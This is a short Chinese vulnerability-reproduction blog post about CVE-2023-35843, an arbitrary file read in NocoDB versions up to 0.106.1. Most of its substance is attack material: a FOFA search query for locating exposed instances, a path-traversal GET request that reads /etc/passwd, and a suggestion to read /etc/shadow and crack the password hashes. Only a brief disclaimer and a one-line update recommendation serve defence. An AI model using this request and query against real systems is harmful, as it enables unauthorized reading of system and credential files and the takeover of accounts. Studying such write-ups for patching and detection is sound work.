【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

admin 2024年2月23日23:31:02评论27 views字数 573阅读1分54秒阅读模式

前言

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!

一:漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二:漏洞影响版本

version<=0.106.1

三:网络空间测绘查询

fofa:
icon_hash="-2017596142"
【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

四:漏洞复现

poc

GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)
【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

五:漏洞利用

可通过读取/etc/shadow读取到加密后的用户名密码,解密后进行后续测试工作

六:修复建议

及时更新至最新版本

原文地址: https://www.freebuf.com/articles/web/379844.html


原文始发于微信公众号(渗透安全团队):【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日23:31:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】NocoDB任意文件读取(CVE-2023-35843)https://cn-sec.com/archives/2113655.html

发表评论

匿名网友 填写信息